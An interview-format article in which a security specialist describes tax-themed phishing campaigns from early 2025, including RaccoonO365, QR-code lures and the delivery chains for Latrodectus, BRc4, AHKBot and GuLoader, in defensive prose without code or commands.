Rupert Marais is our in-house Security specialist with expertise in endpoint and device security, cybersecurity strategies, and network management. In this interview, we dive into the intricacies of recent tax-themed email attacks, the underlying mechanisms of various malware, and the sophisticated tactics used by cybercriminals. Rupert provides detailed insights into how these attacks are orchestrated and the significant impacts they have on organizations.
Can you provide an overview of the recent tax-themed email attacks Microsoft has reported?
These recent tax-themed email attacks are cleverly designed phishing campaigns that employ redirection tactics, such as URL shorteners and QR codes, to avoid detection. They often abuse legitimate services like file-hosting platforms and business profile pages to seem trustworthy. The objective is to lure unsuspecting users into clicking malicious links or opening harmful attachments, leading to credential theft or malware deployment.
What is the RaccoonO365 PhaaS platform and when did it first come to light?
RaccoonO365 is a phishing-as-a-service (PhaaS) platform that facilitates the delivery of phishing pages. This platform gained attention in early December 2024. Essentially, it allows cybercriminals to easily create and deploy phishing campaigns, targeting users’ credentials, often mimicking legitimate services to maximize their effectiveness.
Which types of malware and post-exploitation frameworks are mentioned as being delivered in these campaigns?
These phishing campaigns are noted for delivering a variety of malware, including remote access trojans (RATs) like Remcos RAT. They also distribute other malicious tools like Latrodectus, AHKBot, GuLoader, and the BruteRatel C4 (BRc4) post-exploitation frameworks. Each of these tools serves different malicious purposes, from gaining remote control over infected systems to data exfiltration and further exploitation.
Can you describe the specific campaign Microsoft spotted on February 6, 2025?
On February 6, 2025, Microsoft identified a significant phishing campaign that targeted the United States with hundreds of tax-themed emails. These emails attempted to deliver BRc4 and Latrodectus malware. The attacks were linked to Storm-0249, a known threat actor famous for using malware such as BazaLoader and IcedID.
How does the redirection process work in the attacks involving PDF attachments and fake Docusign pages?
In these attacks, PDF attachments contain links shortened via services like Rebrandly. When users click these links, they are redirected to a fake Docusign page. If the users’ system and IP address meet certain criteria, they are then presented with a JavaScript file that downloads an MSI file for BRc4, leading to the deployment of Latrodectus malware.
What methods were used in the second campaign detected between February 12 and 28, 2025?
The second campaign involved tax-themed phishing emails with no content in the body, featuring a PDF attachment with a QR code. This QR code directed users to phishing pages mimicking Microsoft 365 login screens, tricking them into entering their credentials. Over 2,300 organizations, particularly in the engineering, IT, and consulting sectors, were targeted during this wave of attacks.
In what way are QR codes being used in these phishing attacks and what purpose do they serve?
QR codes are utilized to disguise malicious URLs. When scanned, they direct users to links related to the RaccoonO365 PhaaS platform, often leading to fake login pages that harvest credentials. This method leverages the convenience and novelty of QR codes while bypassing traditional URL-based security measures.
Can you explain the infection chains involving AHKBot?
The AHKBot infection chain typically involves directing users to malicious Microsoft Excel files. Upon enabling macros in these files, a series of downloads occur: first, an MSI file, then an AutoHotKey script, and finally, a Screenshotter module, which captures and exfiltrates screenshots from the compromised system.
What is the exact process through which GuLoader malware is delivered via email?
GuLoader campaigns trick users into clicking on a URL in a PDF attachment, leading to the download of a ZIP file. This ZIP contains shortcut files made to look like tax documents. When launched, these shortcuts use PowerShell to download a PDF and a batch file, which in turn downloads and executes the GuLoader malware, eventually installing Remcos RAT.
What were the findings related to a campaign that utilized Facebook to drive traffic to fake Windows 11 Pro download pages?
This campaign used fake Windows 11 Pro download pages to distribute Latrodectus malware via the BruteRatel tool. Facebook referrer URLs were seen, indicating that the platform was used to drive traffic to these fake download pages.
How are QR codes being used to disguise malicious URLs in widespread attacks?
QR codes are used to conceal malicious URLs by leveraging redirection mechanisms or exploiting legitimate websites’ open redirects. This technique helps attackers bypass URL-based security measures and deliver their payloads more effectively.
What are notable trends found in recent phishing and social engineering campaigns?
Recent campaigns have shown increased sophistication, using techniques like the browser-in-the-browser (BitB) attack to mimic legitimate login pages, hijacking email accounts to send bulk messages, and embedding malicious links in SVG files to bypass filters. Attackers also exploit trusted services like Adobe and DocuSign to evade secure email gateways.
Do you have any advice for our readers?
Stay vigilant about unexpected emails, especially those with attachments or links. Always verify the legitimacy of the source before taking any action. Use multifactor authentication and keep your security software updated to mitigate risks. Consciously adopting these habits can make a significant difference in staying protected from such phishing attacks.
